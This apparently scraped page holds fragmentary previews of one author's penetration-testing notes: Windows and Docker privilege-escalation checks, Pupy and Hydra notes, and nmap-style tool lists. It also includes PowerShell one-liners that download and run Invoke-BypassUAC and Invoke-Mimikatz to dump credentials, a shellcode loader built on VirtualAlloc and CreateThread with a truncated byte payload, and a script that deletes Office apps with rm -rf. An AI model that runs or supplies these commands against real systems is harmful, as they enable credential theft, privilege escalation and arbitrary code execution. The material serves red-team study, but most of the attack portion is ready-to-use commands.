ssstonebraker

[TOC]

Windows Initial Checks

Basic Info

hostname
systeminfo
whoami

Global path

If any part of the SYSTEM %PATH% variable is writeable by Authenticated Users, privesc exists

ssstonebraker

#!/bin/bash

  echo "    Removing Office 365 apps..."
    rm -rf "/Applications/Microsoft Excel.app"
    rm -rf "/Applications/Microsoft OneNote.app"
    rm -rf "/Applications/Microsoft Outlook.app"
    rm -rf "/Applications/Microsoft PowerPoint.app"
    rm -rf "/Applications/Microsoft Word.app"
    rm -rf "/Applications/Microsoft OneDrive.app"
    rm -rf "/Applications/Microsoft Teams.app"

ssstonebraker

List accounts in org

aws organizations list-accounts | grep arn | awk -F'/' '{ print $3 }' | awk -F'"' '{ print $1 }'

ssstonebraker

Basic Usage

To view basic usage just type:

pse

Listing commands for a service

pse <service-name>

ssstonebraker

Pupy Post Exploitation Toolkit Notes

link to project home: https://github.com/n1nj4sec/pupy

Create aliases - modify pupy.conf

Modify pupy.conf Under the section starting with [aliases] you can add them

[aliases]

ssstonebraker

• Fuff
• Opendoor
• amap
• nmap
  • Quick Scan
  • Scan all ports with default set of scripts and SYNC for faster run time
    • Identify Services
    • Identify OS
  • Favorite scans
  • All Ports TCP and UDP

ssstonebraker

Description:

Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start     powershell.exe'"

Invoke-Mimikatz: Dump credentials from memory

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

Import Mimikatz Module to run further commands

ssstonebraker

Hydra

Supported protocols

List1	list2	list3	list4	list5
asterisk	icq	oracle-listener	rexec	snmp
cisco	imap[s]	oracle-sid	rlogin	socks5
cisco-enable	irc	pcanywhere	rpcap	ssh

ssstonebraker

Grep for files on disk

grep --binary-files=text -B 2 '99999:7' /dev/sda1
find / -maxdepth 2 -path '/proc' -prune -o -path '/dev' -prune -o -type f -exec grep "proof.txt" {} +

Docker privilege Escalation

ssstonebraker

$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]] $sc = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,